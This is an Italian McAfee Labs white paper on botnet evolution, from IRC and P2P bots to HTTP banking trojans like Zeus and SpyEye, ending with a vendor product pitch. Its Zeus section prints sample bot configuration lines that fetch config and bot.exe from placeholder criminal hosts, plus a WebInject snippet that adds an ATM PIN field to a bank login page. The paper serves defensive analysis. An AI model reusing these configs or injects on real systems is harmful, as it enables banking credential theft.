La nuova era delle botnet

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "La nuova era delle botnet"

Transcript

1 Di Zheng Bu, Pedro Bueno, Rahul Kashyap e Adam Wosotowsky McAfee Labs

2 Indice dei contenuti Un settore in sviluppo 3 Evoluzione 4 Bot IRC 4 Bot localizzate 4 Bot P2P 4 Bot HTTP 5 Spy Eye 7 Diffusione globale 8 Suddivisione delle botnet: le principali minacce per nazione 9 Il ruolo dei governi 10 Chi è in pericolo? 11 Uno sguardo al futuro 11 Una nuova era di social zombie? 12 La massima clandestinità 13 Controffensiva: Global Threat Intelligence 14 Fonti 14 McAfee Labs 14 Informazioni su McAfee 14

3 Le reti di robot, pubblicamente note come botnet, hanno una storia diversificata. In buona sostanza, con bot si indica semplicemente una serie di script o comandi o un programma creato per collegarsi a qualcosa (solitamente un server) ed eseguire un comando o una serie di comandi. Fondamentalmente esegue varie funzioni. Non è necessariamente malevola o dannosa. Le bot e i loro utilizzi si sono evoluti da semplici canali o osservatori di giochi (per esempio, le botnet Wisner s Bartender e Lindahl s Game Manager) a fornitori di servizi specializzati come la gestione dei database o la manutenzione di elenchi di accesso. Questo report prende in esame un utilizzo molto diverso: il "raggruppamento" di bot (denominate anche droni o zombie) da parte dei criminali informatici a supporto delle loro attività criminali. Poiché interessano le aziende, queste attività criminali possono includere il furto di segreti commerciali, l'inserimento di malware in file di codice sorgente, l'interruzione dell'accesso o di un servizio, il danneggiamento dell'integrità dei dati e il furto delle informazioni relative all'identità dei dipendenti. Le conseguenze per un'azienda possono essere disastrose e portare a perdita di fatturato e fiducia dei clienti, danneggiamento della reputazione, non raggiungimento della conformità con le normative fino alla chiusura dell'attività stessa. Per gli enti governativi, le preoccupazioni sono ancora più estese. Analizzeremo l'evoluzione delle bot criminali, l'industria che ne supporta la creazione e la distribuzione e come vengono oggi utilizzate da vari gruppi di criminali informatici. Suggeriremo inoltre quale riteniamo sarà il loro futuro nel breve periodo. Un settore in sviluppo Il settore delle botnet ha registrato una sorta di "curva di crescita" (sebbene non in senso positivo). Nei primi anni del secolo bot e botnet venivano create da programmatori con una buona conoscenza di networking e protocolli come Internet Relay Chat (IRC). L'utilizzo del protocollo IRC diede avvio al fenomeno del comando e controllo centralizzati, spesso noto anche come C&C. SDBot, una delle prime e più note bot, era codificato in linguaggio C++. (SDBot era molto diffuso perché il suo autore aveva pubblicato il codice sorgente, una pratica non comune.) Versioni più recenti di SDBot, note anche come SpyBot, iniziarono a sfruttare vulnerabilità Microsoft di chiamate di procedura remota; perciò i suoi programmatori avevano bisogno di competenze nella codifica di exploit per creare tali bot. In questo periodo bot e botnet fiorivano sfruttando varie vulnerabilità ampiamente disponibili nelle più comuni piattaforme Microsoft Windows. Le bot che emersero più tardi nel decennio passato presentavano ulteriori funzionalità per lanciare attacchi denial-of-service (DoS), scansione delle porte e keylogging, tra gli altri. Gli autori di questi malware richiedevano competenze nei linguaggi assemblatori nonché una solida formazione in ambito networking. RBot (2003) è stato tra i primi a utilizzare schemi/packer di compressione e cifratura come UPX, Morphine e ASPack. Tali richieste introdussero un nuovo livello di programmatori informatici specializzati che comprendessero schemi di cifratura, crittografia e come utilizzare tecniche evasive creando i loro codici binari. A questo punto, non si poteva guardare indietro. Il successo di RBot spianò la strada per una più ampia diffusione di crifratura e offuscamento in bot e botnet. Uno dei principali sviluppi nel controllo delle botnet è stato l'utilizzo delle reti peer-to-peer (P2P) per le comunicazioni da parte di Sinit (2003) e Phatbot (2004), che ha completamente modificato l'equazione delle comunicazioni delle botnet. Una delle botnet più sofisticate basate su P2P emersa in seguito è stata Worm/Nuwar (2007), che utilizzava un'architettura P2P decentralizzata e si è dimostrata, per una volta, molto difficile da contrastare. L'esigenza di sofisticazione nella tecnologia delle botnet è guidata dalle varie soluzioni di sicurezza presenti sul mercato per combattere tali problemi. Inoltre, la sofisticazione stessa di bot e botnet spinge l'evoluzione delle tecnologie di sicurezza, creando una relazione molto complessa tra misure e contromisure tra gli autori di malware e i fornitori di soluzioni di sicurezza. Chiaramente, bot e botnet sono diventate sempre più complesse. I programmatori di questo malware devono possedere un livello avanzato di conoscenza di reti, sistemi e crittografia. Dati i volumi e il livello di complessità elevati delle botnet, è molto probabile che siano creati non da un piccolo gruppo di persone ma da un insieme di individui fortemente motivati dal ritorno economico delle loro imprese. La motivazione è ovvia: sabotare e compromettere le aziende e rubare dati che hanno un valore monetario. 3

4 Evoluzione Bot IRC Le prime bot non erano sempre dannose. Ma oggi è molto meno comune, specialmente negli ultimi sei anni, a partire dall'esplosione delle botnet nel 2004 circa. Prima di allora, la maggior parte delle bot utilizzava IRC come protocollo per il controllo. Il protocollo IRC è stato utilizzato all'inizio per collegarsi alle chat room, che permettevano alle persone di scambiarsi messaggi, ed erano molto comuni anni fa. Tuttavia, con l'avvento dei protocolli di messaggistica istantanea come ICQ, AIM e MSN Messenger, il protocollo IRC è diventato meno diffuso, ma viene ancora utilizzato da molti professionisti di networking e sicurezza della "vecchia scuola". Le prime bot venivano create per collegarsi a queste chat room (spesso denominate canali), assicurare che il canale rimanesse aperto, riconoscere gli operatori del canale e dare loro il controllo del canale stesso. L'impostazione più comune era quella di creare bot che potessero analizzare una rete e violare le macchine che contenevano nuove o vecchie vulnerabilità. Una volta compromessa una macchina, la bot si sarebbe collegata a una chat room (canale) specifica per ricevere istruzioni dal gestore della bot, come avviare un attacco DoS contro un sito web. Ancora oggi osserviamo tale comportamento nel recente attacco W32/Vulcanbot contro siti web di attivisti per i diritti umani. Altre funzioni IRC comuni sono quelle di prendere videate del sistema, scaricare o far crescere una bot, e così via. Alcune bot possono eseguire oltre 100 comandi. Abbiamo registrato un gran numero di nuove bot nel 2004, a causa del rilascio di varie applicazioni GUI che consentivano agli hacker di creare bot con un semplice clic. Tale facilità ha rappresentato un enorme passo avanti per i criminali informatici e gli autori di malware: oggi coloro che non sapevano come sviluppare programmi e avevano scarse conoscenze di protocolli di networking e sistemi operativi potrebbero creare un'ampia gamma di bot con un semplice clic del mouse. Bot localizzate Le bot funzionano quasi esclusivamente sulle varie versioni di Windows, ma sono emerse anche versioni localizzate. Utilizzando il linguaggio di script Perl, gli hacker hanno creato versioni che funzionano su vari tipi di sistemi operativi Unix e Linux. L'autore di tali versioni è il gruppo di hacker brasiliani Atrix- Team, al tempo solo un gruppo di giovani "smanettoni". Dato il loro formato "aperto", ancora oggi vediamo circolare queste versioni. Bot P2P Le botnet IRC della vecchia scuola sono ancora diffuse, ma hanno un punto debole: il server IRC. Una volta chiuso il server, l'hacker perde il controllo dell'esercito di bot. Nel 2007 è nato un nuovo tipo di botnet che utilizza il protocollo P2P. Si tratta dello stesso protocollo che molti programmi utilizzano per scaricare musica, per esempio. Una di queste botnet utilizzava un'implementazione cifrata basata sul protocollo edonkey. Questo malware è diventato molto famoso: veniva originariamente denominato W32/Nuwar ma è poi salito alla ribalta con il nome di worm. incorporava circa 100 peer preimpostati come valori hash, che il malware decodifica e utilizza per controllare i nuovi file da scaricare. Tutte le transazioni sono cifrate, così solo il malware stesso può decodificare e agire in base alla risposta. Le risposte generalmente portano a URL che scaricano altro codice binario. è stato responsabile della maggior parte dello spam durante gli anni finché non è stato bloccato. Il vantaggio di un approccio P2P risiede nella sua struttura di controllo distribuita e flessibile, che la rende più difficile da bloccare rispetto ad una botnet di tipo IRC. Tuttavia, questa tipologia è più difficile da mantenere e diffondere data la sua complessità. Alla fine di aprile, abbiamo osservato un altro malware che condivideva parte dello stesso codice - responsabile di spam e attacchi DoS - di. 4

5 Bot HTTP Due o tre anni fa, abbiamo assistito a un cambiamento nel controllo di molte botnet da canali IRC a siti web, utilizzando il protocollo HTTP. Questo passaggio a un protocollo comune si è rivelato una mossa intelligente da parte dei criminali informatici e degli autori di malware. L'evoluzione del protocollo HTTP ha avuto inizio con i progressi nei "kit di exploit". Tali kit, sviluppati principalmente da criminali informatici russi, includevano Mpack, ICEPack e Fiesta. Possono installare software su macchine remote e quindi controllarle da un sito web remoto. I criminali informatici inviano spam o un instant message con vari link alle vittime potenziali. Questi link conducono a siti web con installato il kit di exploit. Il kit quindi stabilisce quale exploit utilizzare in base alla nazione, alla versione del sistema operativo e del browser e anche alle versioni delle applicazioni client installate sulla macchina della vittima. Tutto ciò avviene in modo dinamico e a insaputa della vittima. Se l'exploit ha successo, può successivamente installare un insieme di malware per ottenere il controllo remoto della macchina infetta. Di tutte le botnet HTTP attuali un caso molto particolare è rappresentato da Zeus (nota anche come Zbot), specializzata nel furto di credenziali bancarie. Zeus include sia elementi client sia server. Il server include un builder che aiuta il gestore della bot a creare una variante per il client del malware PWS ZBot (il suo identificativo tecnico), che poi infetterà una macchina, portandola ad unirsi alla botnet collegandosi a un sito web remoto che ospita il server Zeus. Zeus segue un trend interessante: consentire a chiunque di creare in modo semplice una versione personalizzata del malware. Il toolkit di Zeus è piuttosto costoso da acquistare, ma il suo autore ha adottato una serie di misure per assicurarsi che lo strumento sia semplice da utilizzare, il che lo rende anche semplice da vendere ad altre persone, incrementando così anche i profitti del suo creatore. Il seguente esempio mostra Zeus Builder per la versione 1.2.x: Il pannello di sinistra mostra solo due opzioni: Information e Builder. Selezionando Information si scopre se la macchina è infettata con Zeus. Selezionando Builder, la persona che controlla il toolkit riceve aiuto per creare una nuova bot. Il kit utilizza due file di input: Config e WebInjects. Sebbene il Builder disponga di un tasto per modificare il file Config, il tasto è solo uno shortcut. Utilizziamo Notepad per modificare il file. Il file Config include i parametri che saranno seguiti dalla bot. 5

6 Esempi di Config: url_config "http://www.[indirizzo-ip-dei-criminali].cn/cp/config.bin" url_compip "http://www.[indirizzo-ip-dei-criminali].com/" 2048 encryption_key " " ;blacklist_languages 1049 end entry "DynamicConfig" url_loader "http://www.[altro-indirizzo-ip-di-criminale].cn/cp/bot.exe" Questo estratto di Config indica alla bot dove dovrebbe andare per scaricare il file di configurazione e la bot stessa. Questi passaggi assicurano che gli hacker che gestiscono le bot possano aggiornare le loro bot e configurazioni con nuove funzioni e nuovi obiettivi in qualunque momento. Inoltre consentono ai responsabili delle bot di distribuire il file di configurazione e il codice binario delle bot a server diversi, creando così flessibilità con un'architettura distribuita. Il secondo file per creare la bot è WebInject. Questo file specifica gli obiettivi, le vittime da cui l'autore di malware o il proprietario del toolkit vuole ottenere informazioni. Zeus è in grado non solo di impossessarsi di informazioni dalla pagina del web originale, ma anche di inserire campi aggiuntivi. In questo modo può impossessarsi di un numero maggiore di informazioni se il proprietario del toolkit lo desidera. Un esempio di WebInject: set_url https://www.[grande-banca-vittima].com/* G data_before <span class="mozcloak"><input type="password"*/></span> data_end data_inject <br><strong><label for="atmpin">atm PIN</label>:</strong> <br /> <span class="mozcloak"><input type="password" accesskey="a" id="atmpin" name="uspass" size="13" maxlength="14" style="width:147px" tabindex="2" /></span> data_end data_after data_end Questo codice sottrarrà le informazioni sull'url, che in questo caso è una banca. Oltre a rubare nome utente e password, Zeus inserirà un altro campo per il numero PIN del Bancomat. 6

7 Come tendono a fare i malware che hanno successo, Zeus ha generato varie versioni "piratate" del Builder. Alcuni includono addirittura i propri backdoor. Come è possibile? Una versione piratata è apparsa nella seguente videata: Questa versione, denominata MultiBuilder, ha creato due varianti sulla base di Zeus Version 1.3. Abbiamo di recente assistito al passaggio di Zeus dalla Versione 1.3 alla 2.0, che oggi include un modello di licenza molto rigoroso. Zeus è in realtà collegato alla macchina fisica dell'acquirente utilizzando una licenza software commerciale! Il canale di creazione e distribuzione di questo malware mostra un forte senso degli affari. Spy Eye Spy Eye è un altro esempio di bot HTTP complessa. Mostra varie similitudini con Zeus, principalmente che si tratta di un form grabber e che vanta un'architettura di controllo davvero impressionante. Come Zeus, Spy Eye dispone del proprio builder grafico: 7

8 Una funzione interessante di Spy Eye è la sua capacità di rimuovere Zeus dalla macchina che infetta, creando un conflitto interessante all'interno del mondo degli autori di malware. Non è la prima volta che assistiamo ad una lotta tra autori di malware. Per evitare di essere analizzati dai loro obiettivi, sia Zeus che Spy Eye offrono l'opzione di utilizzare una chiave di cifratura durante il processo di creazione della bot. Nelle prime versioni di Zeus questa chiave era preimpostata e incorporata, il che offre alle forze di sicurezza un modo molto più rapido per analizzare ed individuare gli obiettivi del malware. Con questa nuova funzione, i malintenzionati hanno sicuramente innalzato il livello del gioco. Diffusione globale Distribuzione complessiva delle botnet per nazione India Brasile Russia Germania Stati Uniti Gran Bretagna Colombia Indonesia Italia Spagna Argentina Polonia Pakistan Portogallo Vietnam Corea del sud Grecia Cina Bielorussia Australia Altri Figura1: McAfee Labs ha rilevato più infezioni botnet - quasi 1,5 milioni - in India che in qualsiasi altra nazione. Anche Brasile, Russia e Germania hanno superato il milione di infezioni rilevate. 8

9 White paper Suddivisione delle botnet : le principali minacce per nazione Argentina Cina Gran Bretagna Australia Bielorussia Brasile Colombia Corea del sud Germania Grecia India Indonesia

10 Italia Pakistan Polonia Portogallo Russia 2 Spagna 2 Stati Uniti 2 Vietnam 2 Figura 2: Le principali botnet, per nazione. è di gran lunga la botnet più diffusa al mondo. Il ruolo dei governi Poiché la minaccia di una guerra informatica e dei danni che potrebbe causare aumenta, probabilmente vedremo le botnet utilizzate come armi in conflitti futuri. Anzi, potrebbero essere già state utilizzate. Nel nostro mondo sempre più tecnologico l'importanza di comunicazioni efficaci nella gestione di qualsiasi crisi è fondamentale. L'organizzazione di risorse e il loro utilizzo per contrastare eventi naturali o artificiali dipende in larga misura da Internet, uno strumento essenziale per divulgare informazioni ad una serie di parti interessate e coordinare le loro risposte. Influire negativamente o interrompere tale flusso informativo potrebbero addirittura peggiorare un evento. Internet potrebbe diventare un altro teatro di guerra. Eventi come la recente marea nera nel Golfo del Messico, i bombardamenti in Europa e in Iraq, o le schermaglie navali tra i coreani possono essere colpiti da interruzioni mirate di nuovi punti o gruppi di risposta d'emergenza, che dipendono da Internet. Le botnet possono essere acquistate o affittate al mercato nero, e i loro proprietari possono forzatamente assumerne il controllo e reindirizzarle per nuovi obiettivi. Sappiamo che ciò accade regolarmente, perciò sarebbe da sciocchi non aspettarsi che organizzazioni governative o stati nazione in tutto il mondo siano coinvolti nell'acquisizione di funzionalità botnet per esigenze offensive e controffensive. Un'entità civica o nazionale ha dei buoni motivi per acquisire una botnet dai suoi attuali proprietari. Le botnet si infiltrano in aziende, singoli e uffici governativi oltre che in workstation militari. È una questione della massima importanza che i diritti intellettuali e di privacy di cittadini e istituzioni in tutto il mondo siano protetti da coloro che li utilizzerebbero illegalmente. Per assumere il controllo di una botnet il nuovo responsabile sarà costretto a scegliere una strategia: chiudere il sistema, il che potrebbe 10

11 potenzialmente danneggiare le macchine che sono parte della botnet, causare seri danni all'infrastruttura ed eventualmente rendere il nuovo proprietario responsabile per il danno; disattivare la botnet finché tutti i nodi infetti vengono modernizzati e non sono più sotto controllo; oppure monitorare la botnet per identificare e catturare il gestore della bot. Ciascuno di questi passaggi è controverso. Chi è in pericolo? Tutti gli utenti di computer sono in pericolo perché tutti navighiamo sulla stessa rete Internet. Ci sono solo una manciata di modi con cui i criminali informatici possono infettare un sistema o una rete con le loro bot (o qualsiasi forma di software dannoso). Questi modi prevedono una qualche forma di social engineering, che può essere definita come una violazione del cervello umano. Gli aggressori utilizzano uno strategemma o un'esca per ingannare gli utenti di computer e spingerli o a fare clic su un link o a installare un programma che non utilizzerebbero altrimenti. Una delle tecniche più intelligenti e diffuse oggi per i criminali informatici è quella di utilizzare eventi di cronaca di alto profilo per attirare vittime inconsapevoli. I criminali informatici leggono le stesse notizie di cronaca e sanno che molte persone consultano le notizie online. Che si tratti di un link che finge di essere un video di un disastro attuale o un dramma che interessa celebrità famose, tali stratagemmi attirano utenti come il miele con gli orsi. Tali aggressori potrebbero insegnare qualche trucco ai responsabili marketing con la loro conoscenza del comportamento umano e che cosa gli utenti ricercano online. Dobbiamo rimanere consapevoli dei rischi che corriamo navigando e utilizzando le tecnologie Web 2.0 dal momento che i criminali informatici utilizzeranno le notizie per colpirci. Ciascuno di noi dovrebbe essere sospettoso nei confronti degli attacchi di social networking, ma aziende e governi subiscono i maggiori danni dagli attacchi di botnet. Alcune delle minacce per le aziende includono: Click fraud: visitando pagine web e tramite clic automatico su banner pubblicitari per sottrarre grandi somme di denaro da società pubblicitarie online Attacchi DoS distribuiti: saturazione della larghezza di banda per bloccare il traffico legittimo. Questi attacchi sono più spesso condotti da aziende concorrenti, clienti insoddisfatti o per motivi politici. Infiltrazione in file system: accesso a sistemi critici per rubare dati dei clienti, informazioni sulla privacy dei dipendenti, segreti commerciali, informazioni finanziarie aziendali, ecc. Disabilitazione della sicurezza esistente: prevenzione delle attività di bonifica o dirottamento da parte di proprietari di bot rivali Spam: utilizzo di risorse e larghezza di banda di altri sistemi per inviare grandi quantità di spam Infezioni del codice sorgente: avvelenamento dell'intero albero del codice sorgente inserendo modifiche non autorizzate e impercettibili o individuazione di ulteriori vulnerabilità da sfruttare Le conseguenze di tali attacchi possono essere piuttosto gravi, con costi significativi per le aziende in termini di manodopera e tempo per le attività di bonifica. Inoltre, le aziende potrebbero vedere annullati i loro mandati di conformità con le normative o di settore. Sono inoltre probabili responsabilità legali da parte di clienti, dipendenti o altri che abbiano subito danni per colpa di misure di sicurezza inadeguate da parte dell'azienda. Per i governi e i proprietari di infrastrutture critiche, i danni causati dalle botnet possono essere anche più estesi: Gli attacchi DoS possono interrompere le comunicazioni durante una crisi. Le infezioni al codice sorgente possono provocare la chiusura di reti critiche. I sistemi ad accesso ristretto possono fornire al nemico informazioni militari. Uno sguardo al futuro Negli ultimi sei anni, le botnet sono diventate una delle maggiori minacce non solo per i professionisti della sicurezza informatica ma anche per le aziende e i consumatori, praticamente chiunque possegga un computer. Le botnet rappresentano l'infrastruttura più essenziale utilizzata da criminali informatici e governi per lanciare praticamente ogni tipo di attacco: dallo spionaggio e fuoriuscita di dati allo spam agli attacchi DDoS. McAfee Labs ha già osservato un trend importante verso un'infrastruttura di botnet più distribuita e flessibile, che si basa su tecnologie solide come il protocollo P2P, il controllo via web e i servizi Web 2.0, oltre che su tecniche di evasione e fail-over. 11

12 Una nuova era di social zombie? Di pari passo con l'evoluzione dei servizi Web 2.0 aumentano anche le attività degli autori di botnet, man mano che adottano nuove tecnologie per incrementare la complessità dei loro attacchi. KeriosC2, mentre scriviamo questo report, è uno strumento proof-of-concept che dimostra che LinkedIn, Twitter e TinyURL possono essere utilizzati per controllare una botnet. Gli utenti di computer in tutto il mondo si divertono con il social networking; ora lo fanno anche le botnet. E non si tratta di uno sviluppo positivo. Dal momento che le botnet sfruttano applicazioni e protocolli utilizzati comunemente, sarà più difficile che mai rilevare e prevenire le comunicazioni delle botnet. Un ulteriore sviluppo si è verificato a maggio, quando alcune bot hanno iniziato ad utilizzare Twitter per ricevere i comandi. La funzionalità è al momento piuttosto semplice; si limita a monitorare (o seguire) un account Twitter per ricevere i comandi. Come si evince dalla videata seguente, ha un builder GUI molto semplice. A differenza dei più complessi Zeus o Spy Eye, questa forma non include alcuna opzione, semplicemente un campo in cui inserire il nome utente di Twitter, che la bot seguirà per ricevere i comandi. Mentre scriviamo, anche la struttura e la sintassi del comando sono elementari:.visit: per aprire una pagina specifica.download: per scaricare un file da un'ubicazione remota.ddos: per causare un attacco denial of service alla vittima 12

13 La massima clandestinità Gli autori di botnet hanno adottato molti approcci per evitare il rilevamento da parte di software o dispositivi di sicurezza. In termini di processo, gli autori di malware testano comunemente il loro malware con i prodotti dei principali vendor di sicurezza per assicurarsi che non vengano individuati, o quasi. Di conseguenza, criminali informatici e autori di malware spesso pubblicizzano il loro malware come "a prova di rilevamento". Elenchi di controllo degli accessi o l'applicazione di policy basate su IP possono rappresentare un controllo efficace contro le connessioni da parte di una bot verso i suoi server di controllo. Autori di botnet e malware hanno risposto a tale contrattacco implementando algoritmi di flusso invece che utilizzare elenchi IP incorporati per i loro server di comando. Zeus utilizza questa tecnica per generare domini rapidamente. Questo passaggio può sconfiggere in modo efficace i molti meccanismi di rilevamento basati sulle tradizionali blacklist. I malintenzionati hanno sviluppato molte tecniche di evasione per i download drive-by per evitare l'ispezione da parte di dispositivi di sicurezza di rete. Un buon esempio è la manipolazione dell'estensione dei file dimostrata dal builder Gh0st RAT. (Consultare la videata seguente.) Operazione Aurora e altre nuove minacce malware hanno utilizzato trucchi simili. Osserviamo molti altri tipi di evasioni - dalla semplice codifica alla cifratura (anche effettuando lo xoring del codice binario) - nel tentativo da parte degli autori di malware di installare il loro software sulla macchina di una vittima. Nel corso degli ultimi anni molte botnet di grandi dimensioni sono state messe offline. Per evitare che ciò accada e rendere la loro infrastruttura di botnet più solida e flessibile, i responsabili delle bot hanno iniziato ad introdurre nuove tecniche. Abbiamo già osservato le tecniche di flusso per incrementare la flessibilità dei server di controllo. Il protocollo P2P, sebbene costoso da implementare e supportare, è stato utilizzato anche in alcune botnet furtive come e Nugache. I protocolli web, sia cifrati che in chiaro, vengono ampiamente utilizzati in sostituzione dei comandi per il protocollo IRC utilizzato più comunemente, principalmente perché queste porte web sono quasi universalmente abilitate attraverso i firewall, anche in reti aziendali rigorosamente controllate. McAfee Labs prevede che criminali informatici e autori di botnet continueranno a spingersi ai limiti delle tecnologie Web 2.0. Di seguito alcuni altri avanzamenti previsti: Funzionalità ed accesso multibrowser ben oltre Internet Explorer e Firefox Maggiore integrazione incorporata con tecnologie di instant-messaging come JabberZeuS per fornire un rapido accesso ai dati bancari e non solo Ulteriore integrazione con altro malware, come Bredolad e Pushdo, per assicurare una maggior diffusione sui sistemi a livelo globale 13

14 Controffensiva: Global Threat Intelligence Poiché le minacce informatiche sono cresciute in modo esponenziale diventando anche sempre più complesse, i professionisti della sicurezza richiedono un approccio diverso per rilevare e contrastare gli attacchi. In passato, una strategia di difesa approfondita - una stratificazione di tecnologie simili - era sufficiente. L'approccio odierno, tuttavia, deve sfruttare le informazioni correlate sulle minacce provenienti da tutto il mondo e per tutti i vettori delle minacce. Tali informazioni di intelligence devono essere poi incorporate in un'ampia gamma di prodotti di sicurezza per consentirgli di applicare policy locali sulla base della più recente attività delle minacce e per condividere informazioni in modo che l'infrastruttura di sicurezza complessiva operi in modo armonico. McAfee sta scrivendo il capitolo successivo per quanto riguarda la sicurezza approfondita con Global Threat Intelligence, il nostro motore nel cloud che raccoglie e correla i dati sulle minacce provenienti da tutti i vettori delle minacce, crea un modello di minaccia completo e offre protezione al mercato tramite una suite completa di prodotti di sicurezza. La nostra funzionalità cloud opera di concerto con i motori locali dei prodotti McAfee e i meccanismi di enforcement basati sulle policy per fornire la protezione contro le minacce più solida e completa disponibile sul mercato. I nostri clienti beneficiano dall'utilizzo di prodotti di sicurezza McAfee che non solo condividono le informazioni di intelligence, ma lo fanno in modo significativo e contestuale al loro ruolo e a dove risiedono sulla rete. Fonti "Progress Made, Trends Observed" (I progressi fatti, i trend rilevati), Microsoft Antimalware Team. -%20progress%20made%20lessons%20learned.pdf SecureWorks. White paper tecnici McAfee Labs. McAfee Labs McAfee Labs è il gruppo di ricerca mondiale di McAfee, Inc. Con l'unica organizzazione di ricerca focalizzata su tutti i vettori di minaccia, ovvero malware, web, , rete e vulnerabilità, McAfee Labs è in grado di sfruttare l'intelligence di milioni di sensori e tecnologie di reputazione "in the cloud", quali McAfee Artemis e McAfee TrustedSource. I 350 ricercatori pluridisciplinari di McAfee Labs in 30 nazioni seguono la gamma completa di minacce in tempo reale, identificando le vulnerabilità delle applicazioni, analizzando e correlando i rischi e attivando rimedi immediati per proteggere aziende e consumatori. Informazioni su McAfee Con sede principale a Santa Clara, California, McAfee Inc. è la principale azienda focalizzata sulle tecnologie di sicurezza. McAfee è costantemente impegnata ad affrontare le più difficili sfide legate alla sicurezza. L'azienda offre prodotti e servizi di sicurezza riconosciuti e proattivi che proteggono sistemi e reti in tutto il mondo, consentendo agli utenti di collegarsi a Internet, navigare ed effettuare acquisti sul web in modo sicuro. Supportata da un pluripremiato team di ricerca, McAfee crea prodotti innovativi destinati a utenti consumer, aziende, pubblica amministrazione e service provider che necessitano di conformarsi alle normative, proteggere i dati, prevenire le interruzioni dell'attività, individuare le vulnerabilità e monitorare e migliorare costantemente la propria sicurezza. Le informazioni contenute nel presente documento sono fornite solo a scopo istruttivo e a vantaggio dei clienti di McAfee. Le informazioni contenute nel presente documento sono soggette a modifica senza preavviso e vengono fornite "così come sono" senza alcuna garanzia relativamente alla loro precisione o applicabilità a qualunque situazione o circostanza specifica. McAfee Srl via Fantoli, Milano Italia (+39) McAfee e il logo McAfee sono marchi registrati o marchi di McAfee, Inc. o sue filiali negli Stati Uniti e altre nazioni. Gli altri marchi e le altre marche possono essere di proprietà di terzi. I piani, le specifiche e le descrizioni dei prodotti sono qui forniti a puro scopo informativo e sono soggetti a variazioni senza preavviso, e vengono forniti senza alcun tipo di garanzia, esplicita o implicita wp_botnets_0710_ETMG

DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI

DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI 2 Introduzione Questa email è una truffa o è legittima? È ciò che si chiedono con sempre maggiore frequenza

Dettagli

INFORMATIVA SUI COOKIE

INFORMATIVA SUI COOKIE INFORMATIVA SUI COOKIE I Cookie sono costituiti da porzioni di codice installate all'interno del browser che assistono il Titolare nell erogazione del servizio in base alle finalità descritte. Alcune delle

Dettagli

LA PRIMA E UNICA SOLUZIONE UNIFICATA PER LA SICUREZZA DEI CONTENUTI

LA PRIMA E UNICA SOLUZIONE UNIFICATA PER LA SICUREZZA DEI CONTENUTI LA PRIMA E UNICA SOLUZIONE UNIFICATA PER LA SICUREZZA DEI CONTENUTI È ora di pensare ad una nuova soluzione. I contenuti sono la linfa vitale di ogni azienda. Il modo in cui li creiamo, li utiliziamo e

Dettagli

Note e informazioni legali

Note e informazioni legali Note e informazioni legali Proprietà del sito; accettazione delle condizioni d uso I presenti termini e condizioni di utilizzo ( Condizioni d uso ) si applicano al sito web di Italiana Audion pubblicato

Dettagli

Accordo d Uso (settembre 2014)

Accordo d Uso (settembre 2014) Accordo d Uso (settembre 2014) Il seguente Accordo d uso, di seguito Accordo, disciplina l utilizzo del Servizio on line 4GUEST, di seguito Servizio, che prevede, la creazione di Viaggi, Itinerari, Percorsi,

Dettagli

GUIDA ALLE BEST PRACTICE PER MOBILE DEVICE MANAGEMENT E MOBILE SECURITY

GUIDA ALLE BEST PRACTICE PER MOBILE DEVICE MANAGEMENT E MOBILE SECURITY GUIDA ALLE BEST PRACTICE PER MOBILE DEVICE MANAGEMENT E MOBILE SECURITY Con Kaspersky, adesso è possibile. www.kaspersky.it/business Be Ready for What's Next SOMMARIO Pagina 1. APERTI 24 ORE SU 24...2

Dettagli

GUIDA ELETTRONICA ALLA VITA DIGITALE. 5 motivi per cui gli stratagemmi del social engineering funzionano

GUIDA ELETTRONICA ALLA VITA DIGITALE. 5 motivi per cui gli stratagemmi del social engineering funzionano GUIDA ELETTRONICA ALLA VITA DIGITALE 5 motivi per cui gli stratagemmi del social engineering funzionano Che cos è il social engineering? Il social engineering è l arte di raggirare le persone. Si tratta

Dettagli

Come difendersi dai VIRUS

Come difendersi dai VIRUS Come difendersi dai VIRUS DEFINIZIONE Un virus è un programma, cioè una serie di istruzioni, scritte in un linguaggio di programmazione, in passato era di solito di basso livello*, mentre con l'avvento

Dettagli

TeamViewer 8 Manuale Controllo remoto

TeamViewer 8 Manuale Controllo remoto TeamViewer 8 Manuale Controllo remoto Rev 8.0-12/2012 TeamViewer GmbH Kuhnbergstraße 16 D-73037 Göppingen www.teamviewer.com Indice 1 Informazioni su TeamViewer... 6 1.1 Informazioni sul software... 6

Dettagli

Come si sfrutta la debolezza del sistema operativo umano

Come si sfrutta la debolezza del sistema operativo umano Come si sfrutta la debolezza del sistema operativo umano Raj Samani, CTO EMEA Charles McFarland, Senior Research Engineer per MTIS Molti attacchi informatici contengono un elemento di social engineering,

Dettagli

Symbolic. Ambiti Operativi. Presente sul mercato da circa 10 anni Specializzata in Network Security Partner e distributore italiano di F-Secure Corp.

Symbolic. Ambiti Operativi. Presente sul mercato da circa 10 anni Specializzata in Network Security Partner e distributore italiano di F-Secure Corp. Symbolic Presente sul mercato da circa 10 anni Specializzata in Network Security Partner e distributore italiano di F-Secure Corp. La nostra mission è di rendere disponibili soluzioni avanzate per la sicurezza

Dettagli

TeamViewer 7 Manuale Controllo remoto

TeamViewer 7 Manuale Controllo remoto TeamViewer 7 Manuale Controllo remoto TeamViewer GmbH Kuhnbergstraße 16 D-73037 Göppingen teamviewer.com Indice 1 Informazioni su TeamViewer... 5 1.1 Informazioni sul software... 5 1.2 Informazioni sul

Dettagli

FileMaker Server 12. Guida introduttiva

FileMaker Server 12. Guida introduttiva FileMaker Server 12 Guida introduttiva 2007 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi di FileMaker,

Dettagli

Payment Card Industry (PCI) Data Security Standard

Payment Card Industry (PCI) Data Security Standard Payment Card Industry (PCI) Data Security Standard Procedure per la scansione di sicurezza Versione 1.1 Release: settembre 2006 Indice generale Finalità... 1 Introduzione... 1 Ambito di applicazione dei

Dettagli

Guida Dell di base all'acquisto dei server

Guida Dell di base all'acquisto dei server Guida Dell di base all'acquisto dei server Per le piccole aziende che dispongono di più computer è opportuno investire in un server che aiuti a garantire la sicurezza e l'organizzazione dei dati, consentendo

Dettagli

Privacy Policy del sito http://www.plastic-glass.com

